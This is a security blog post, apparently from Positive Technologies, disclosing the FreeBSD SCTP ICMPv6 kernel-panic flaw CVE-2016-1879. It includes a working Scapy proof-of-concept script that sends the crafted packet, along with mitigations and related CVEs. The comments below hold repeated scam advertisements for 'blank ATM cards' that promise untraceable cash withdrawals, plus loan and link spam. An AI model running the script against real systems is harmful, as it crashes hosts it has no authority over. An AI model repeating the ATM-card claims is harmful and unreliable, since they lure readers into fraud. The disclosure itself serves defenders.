Pages

Friday, January 22, 2016

FreeBSD Remote DoS Exploit (Demo) (CVE-2016-1879)


The FreeBSD team has announced their operating system was detected to contain critical vulnerabilities that could be exploited to conduct DoS attacks, escalate user privileges, and disclose important data.

SCTP ICMPv6 error processing vulnerability (CVE-2016-1879)

SCTP (stream control transmission protocol) is a transport-layer protocol designed to transfer signaling messages in an IP environment. As a rule, mobile operators use this protocol in technological networks.

This vulnerability threatens FreeBSD systems (versions 9.3, 10.1, and 10.2) if they support SCTP and IPv6 (default configuration). To exploit this flaw, a malefactor needs to send a specially crafted ICMPv6 message. And if he succeeds, he can conduct a DoS attack.

Denial of service is caused by improper check of the length of an SCTP packet header received from the ICMPv6 error message. If the target recipient is unavailable, the router can generate an error message and send it to the sender via ICMPv6.

This ICMPv6 packet includes the original IPv6 packet where the Next Header field indicates how SCTP is encapsulated.



When the kernel receives the error message via ICMPv6, it transfers the upper-level protocol packet to a necessary parser (sctp6_ctlinput()). The SCTP parser considers the incoming header has the required length, tries to copy it using m_copydata(), which has offset values and the number of bytes. Since a twelve-byte chunk is expected, if the attacker sends a packet with an eleven-byte header, a NULL pointer is dereferenced causing kernel panic.

There is no need for an open SCTP socket to successfully exploit this vulnerability. Scapy can help to create an ICMPv6 packet.

#!/usr/bin/env python # -*- coding: utf-8 -*- import argparse from scapy.all import * def get_args(): parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78) parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address") parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address") parser.add_argument("-I", "--iface", type=str, help="Iface") options = parser.parse_args() if options.dst_mac is None or options.dst_ipv6 is None: parser.print_help() exit() return options if __name__ == '__main__': options = get_args() sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'), iface=options.iface)

Below is the video demonstration of the attack.



To protect your system from this flaw, we recommend that you perform the following:

  • Disable IPv6 addressing if not necessary
  • Block ICMPv6 or IPv6 traffic on the firewall
  • Disable the SCTP stack support in the OS kernel if it is not needed (kernel recompilation is required)

To fix the vulnerability, you can use the vendor's patch, which installs additional checks for processing SCTP ICMPv6 messages. The kernel recompilation is required.

And that's not the half of it

The system was also detected to include other severe vulnerabilities. The FreeBSD developers released several patches to close these flaws:

  1. A vulnerability that allows for a DoS attack via exploiting TCP connections if TCP_MD5SIG and TCP_NOOPT are enabled. A hacker needs to open a listening socket with the TCP_NOOPT option enabled to exploit this flaw (CVE-2016-1882, the patch).
  2. A vulnerability that allows for user privilege escalation or DoS. It is caused by an access control error that makes it possible to rewrite random memory fields using Linux setgroups(2) (CVE-2016-1881, the patch).
  3. A Linux Robust Futex error allows for system memory data disclosure (CVE-2016-1880, the patch).
  4. Insecure default settings that allow access to the daemon configuration file “/etc/bsnmpd.conf” (CVE-2015-5677, the patch).

To protect your systems from exploitation of these vulnerabilities, Positive Technologies recommend that you use IPv6 addressing only if it is strongly required, install security patches timely, and use special tools to control system security (e.g. MaxPatrol).

64 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
    2. This comment has been removed by a blog administrator.

      Delete
    3. Hey Guys!!! I got mine from Jane. My blank ATM card can withdraw €2,000 daily. I got it from Her last week Wednesday and now I have €7,000 for free. The card withdraws money from any ATM machines and there is no name on it, it is not traceable and now i have money for bussiness and enough money for me and my 4 kids. I am really happy i met Jane because i met two people before him and they took my money not knowing that they were scams. But am happy now. Jane sent the card through DHL and i got it in two days. Get one from her now. Sh e is giving it out to help people even if it is illegal but it helps a lot and no one ever gets caught. The card works in all countries except Philippines, Mali and Nigeria. Jane's email address is janeashley333@gmail.com :)

      Delete
    4. HACK ATM MACHINES NEAREST TO YOU AND BECOME RICH!!!
      You can hack and break into a bank’s security ATM Machine without carrying guns or any weapon.

      How is this possible?
      First of all we have to learn about the manual hacking of ATM MACHINES and BANKING

      ACCOUNTS.
      HOW THE ATM MACHINE WORKS.
      If you have been to the bank you find out that the money in the ATM MACHINE is being filled right inside the house where the machine is built with enough security. To hack this machine We have develop a special blank ATM Card which you can use in any ATM Machine around the world. This ATM card is been programmed and can withdraw $1000 within 24 hours
      in any currency. There is no ATM MACHINES this BLANK ATM CARD CANNOT penetrate because its been programmed with various tools and software. The card will make the security camera
      malfunction at that particular time until you are done with the transaction you can never be trace. It also has a technique that makes it impossible for the CCTVs to detect you,
      Getting the card you will forward the me your details so we can proceed to send the card to you once you agree to the terms and conditions. You would wonder why i send out the cards instead of using them my self to get enough money. The card does not work in my current country so i am using it to help people,The card works in all countries except Philippines, Mali and Nigeria. and they will send me part of the money
      once they get it and use it. If you are interested then email Rebecca Brown for more info:(rebeccabrown328@gmail.com)

      Delete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete
  5. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
  6. This comment has been removed by a blog administrator.

    ReplyDelete
  7. This comment has been removed by a blog administrator.

    ReplyDelete
  8. This comment has been removed by a blog administrator.

    ReplyDelete
  9. This comment has been removed by a blog administrator.

    ReplyDelete
  10. This comment has been removed by a blog administrator.

    ReplyDelete
  11. This comment has been removed by a blog administrator.

    ReplyDelete
  12. This comment has been removed by a blog administrator.

    ReplyDelete
  13. This comment has been removed by a blog administrator.

    ReplyDelete
  14. This comment has been removed by a blog administrator.

    ReplyDelete
  15. This comment has been removed by a blog administrator.

    ReplyDelete
  16. This comment has been removed by a blog administrator.

    ReplyDelete
  17. This comment has been removed by a blog administrator.

    ReplyDelete
  18. This comment has been removed by a blog administrator.

    ReplyDelete
  19. This comment has been removed by a blog administrator.

    ReplyDelete
  20. This comment has been removed by a blog administrator.

    ReplyDelete
  21. This comment has been removed by a blog administrator.

    ReplyDelete
  22. This comment has been removed by a blog administrator.

    ReplyDelete
  23. This comment has been removed by the author.

    ReplyDelete
  24. This comment has been removed by a blog administrator.

    ReplyDelete
  25. This comment has been removed by a blog administrator.

    ReplyDelete
  26. This comment has been removed by a blog administrator.

    ReplyDelete
  27. This comment has been removed by a blog administrator.

    ReplyDelete
  28. This comment has been removed by a blog administrator.

    ReplyDelete
  29. This comment has been removed by a blog administrator.

    ReplyDelete
  30. This comment has been removed by a blog administrator.

    ReplyDelete
  31. This comment has been removed by a blog administrator.

    ReplyDelete
  32. This comment has been removed by a blog administrator.

    ReplyDelete
  33. This comment has been removed by a blog administrator.

    ReplyDelete
  34. Hello, My name is JOHN from UK.I want to share my experience with everyone. I have being hearing about this blank ATM card for a while and i never really paid any interest to it because of my doubts. Until one day i discovered a hacking man called LUCKY. he is really good at what he is doing. Back to the point, I inquired about The Blank ATM Card. If it works or even Exist. he told me Yes and that its a card programmed for random money withdraws without being noticed and can also be used for free online purchases of any kind. This was shocking and i still had my doubts. Then i gave it a try and asked for the card and agreed to their terms and conditions. Hoping and praying it was not a scam. One week later i received my card and tried with the closest ATM machine close to me, It worked like magic. I was able to withdraw up to $2,000. This was unbelievable and the happiest day of my life. So far i have being able to withdraw up to $20,000 without any stress of being caught. I don’t know why i am posting this here, i just felt this might help those of us in need of financial stability. blank atm has really change my life. If you want the blank atm card contact he,On this email address {LUCKYHACKERS98@GMAIL.COM}And they will also Change your Life.

    ReplyDelete
  35. BE SMART AND BECOME RICH IN LESS THAN 3DAYS....It all depends on how fast you can be to get the new PROGRAMMED blank ATM card that is capable of hacking into any ATM machine,anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago..It has really changed my life for good and now I can say I'm rich and I can never be poor again. The least money I get in a month with it is about $50,000.(fifty thousand USD). Everyday I keeping pumping money into my account. Though it is illegal, there is no risk of being caught, because it has been programmed in such a way that it is not traceable, it also has a technique that makes it impossible for the CCTV's to detect you.. For details on how to get yours today, email the hackers on: johnhart0022@gmail.com. Tell your loved ones too, and start to live large. That's the simple testimony of how my life changed for good... Love you all... The email address again is johnhart0022@gmail.com

    ReplyDelete
  36. BE SMART AND BECOME RICH IN LESS THAN 3DAYS....It all depends on how fast you can be to get the new PROGRAMMED blank ATM card that is capable of hacking into any ATM machine,anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago..It has really changed my life for good and now I can say I'm rich and I can never be poor again. The least money I get in a month with it is about $50,000.(fifty thousand USD). Everyday I keeping pumping money into my account. Though it is illegal, there is no risk of being caught, because it has been programmed in such a way that it is not traceable, it also has a technique that makes it impossible for the CCTV's to detect you.. For details on how to get yours today, email the hackers on: johnhart0022@gmail.com. Tell your loved ones too, and start to live large. That's the simple testimony of how my life changed for good... Love you all... The email address again is johnhart0022@gmail.com

    ReplyDelete
  37. Do you need a loan? Are you a business man or woman and you need a loan to increase your business?? Do you need capital to start up a business? Whatever your loan problems might be, here comes your help as we offer loans to both individuals and firms at low and affordable interest rate. Contact us today at (carrenbenfirm@outlook.com or carrenbenfirm@gmail.com) to get your loan today.

    ReplyDelete
  38. Hi, My name is Bella Johnson and i just want to share my experience with everyone. I have being hearing about this blank ATM card for a while and i never really paid any interest to it because of my doubts. Until one day i discovered a hacking Lady called Jennifer Perry . she is really good at what she is doing. Back to the point, I inquired about The Blank ATM Card to see If it works or even Exist. They told me Yes and that its a card programmed for random money withdraws without being noticed and can also be used for free online purchases of any kind.

    This was shocking and i still had my doubts. Then i gave it a try and asked for the card and agreed to their terms and conditions. Hoping and praying it was not a scam. One week later i received my card and tried with the closest ATM machine close to me, It worked like magic. I was able to withdraw up to $5000. This was unbelievable and the happiest day of my life. So far i have been able to withdraw up to $28000 without any stress of being caught. I don't know why i am posting this here, i just felt this might help those of us in need of financial help, the blank Atm has really changed my life. If you want to contact them, Here is the email address (atm_hacker125@outlook.com) And I believe they will also Change your Life. The same email (atm_hacker125@outlook.com)

    ReplyDelete
  39. I am certain this post has offered me some assistance with saving numerous hours of perusing other related presents just on find what I was searching for. Much obliged!
    Case Analysis

    ReplyDelete
  40. This is the happiest moment of my life having no longer to worry about paying bills as i have been settled for life. A lot has been said about atm hacking and blank card for cash withdrawal but it all seemed like a myth to me until i eventually lost my job few months back and the world seemed to be moving backwards. I went online in search of jobs and means to an end and there i found comments about STAR TECH AGENCY and how they deliver this card in less than 7 days with no risk involved and a far much lesser price compared to what the card itself can give you, i then made contact and in exactly 6 days latter my card and a manual was delivered to my home address here in the US and that same evening i used the card was able to take out $2000 for a start its been just 3 weeks and my life has taken a new shape. I simply want to say thank you to this company and help spread their fame abroad. If you ever are in need of this card definitely contact willsmith005@outlook.com and be rest assured of trusted and certified services.

    ReplyDelete
  41. Become rich today and take the risk of transforming your own life.Try and get a blank ATM card today from (MR Robinson) and be among the lucky ones who are benefiting from this cards. This PROGRAMMED blank ATM card is capable of hacking into any ATM machine and anywhere in the world and it can't be traced.I got to know about this BLANK ATM CARD when I was searching for job online about a month ago.It has really changed my life for good and now I can say I'm rich all Thanks to Mr Robinson.With this blanked ATM card you can withdraw the maximum of $1000 daily and i have withdraw $50,000 for a month now this is my way of thanking Mr Robinson for all he has done for me contact him at robinsonblankatmhackers@outlook.com and get yours now.

    ReplyDelete
  42. Talking about getting blank atm card seek no further but contact
    jamesoliverblankatmhackers@outlook.com for credibility in service. The card i
    got from this company came with a stock cash of $50,000 and i have not
    had course to complain with their services for the past 3 months of
    usage. I personally recommend jamesoliverblankatmhackers@outlook.com for optimum
    services.

    ReplyDelete
  43. مع اركان المملكه انت الافضل دائما وهكذا نتعامل بكل صدق والعمل الجاد والوافر فى هذا المجال مجال التنظيف
    شركة تنظيف بالاحساءاذا معنا انت فى ايدى امينه نتعامل معك باقل الاسعار الممكنه فى كافه المجالات
    اذا اتصلوا نصلكم فى كل وقت وكل مكان لدينا الامكانيات الوفيره والكامله من اجل العمل الجاد والدئوب
    العمل بامانه سمه من سمات شركة اركان المملكه التى لها باع طويل فلى العمل اليومى والفعالشركة مكافحه حشرات بالاحساءاذا نحن نتقدم اليك باقل السعار المتاحه والممكنه فى مجال التنظيف والمكافحه على حد سواء
    اتصلوا نصلكم فى كل وقت وكل مكان فى كافه ارجاء المملكه السعوديهشركة تنظيف بالطائفمعنا انت الافضل دائما بالمملكه نقدم لكم العمل الجاد والهادف والفعال

    ReplyDelete
  44. لا داعى للقلق وانت تتعامل مع شركة اركان المملكه للتنظيف والمكافحه والتسليك
    وغير ذالك من كافه انواع التنظيف فى المملكه السعوديه باكملها اذا
    كل ما عليكم هو زياره صفحتنا للتطلع على اقل الاسعار المتاحه
    والتى تفى احتياجاتكم الخاصه
    0544369605

    شركة كشف تسربات المياه بابها

    شركة تسليك مجارى بابها

    شركة مكافحة حشرات بابها

    شركة تنظيف بابها

    شركة تنظيف فلل بابها

    شركة تنظيف منازل بابها

    اتصلوا بنا دائما تجدونا فى كل وقت وكل مكان
    لاننا نتعامل بمنتهى الدقه والفعاله والاهميه الكبيره مع شركة
    اركان المملكه لاداعى للقلق نحن معك دائما

    ReplyDelete
  45. I started in time-sharing and networking with packet switching, which was the precursor to what became the Internet. Time-shared use on packet-switch networks, when you think about it, is the cloud. kratom dosage

    ReplyDelete
  46. This is very amazing to see such work over here. Slither | Agario | Happy Wheels | slitherio Carry on the discussions over night.

    ReplyDelete
  47. The war between humans, orcs and elves continues. Lead your race through a series of epic battles, using your crossbow to fend off foes and sending out units to destroy castles. Researching and upgrading wisely will be crucial to your success! There are 5 ages total and each one will bring you new units to train to fight in the war for you cause.
    earn to die 2 | game earn to die
    | unfair mario | slitherio
    Whatever you do, don’t neglect your home base because you cannot repair it and once it is destroyed, you lose! Age of War is the first game of the series and really sets the tone for the Age of War games . Also try out the Age of Defense series as it is pretty similar.
    In this game, you start at the cavern men’s age, then evolve! There is a total of 5 ages, each with its units and turrets. Take control of 16 different units and 15 different turrets to defend your base and destroy your enemy.
    tank trouble | age of war | age of war 6 | gold miner
    The goal of the game also differs depending on the level. In most levels the goal is to reach a finish line or to collect tokens. Many levels feature alternate or nonexistent goals for the player.

    ReplyDelete
  48. I'm more propelled to have a site to give data, for example, the remarkable your online journal.
    Investing Sustainably at Ontario Teachers' Pension Plan Case Solution

    ReplyDelete
  49. Welcomes to google terminal keep sharing such ideas in the future as well.
    google snake this was actually EARN TO DIE
    what i was looking for,and i am glad to came here! AGE OF WAR 2
    Hi! I’ve been reading your blog for a while HAPPY WHEELS
    I want you to thank for your time of this wonderful read!!! Slitherio
    Amazing insight you have on this, Slither io This article always blew me BIG FARM

    ReplyDelete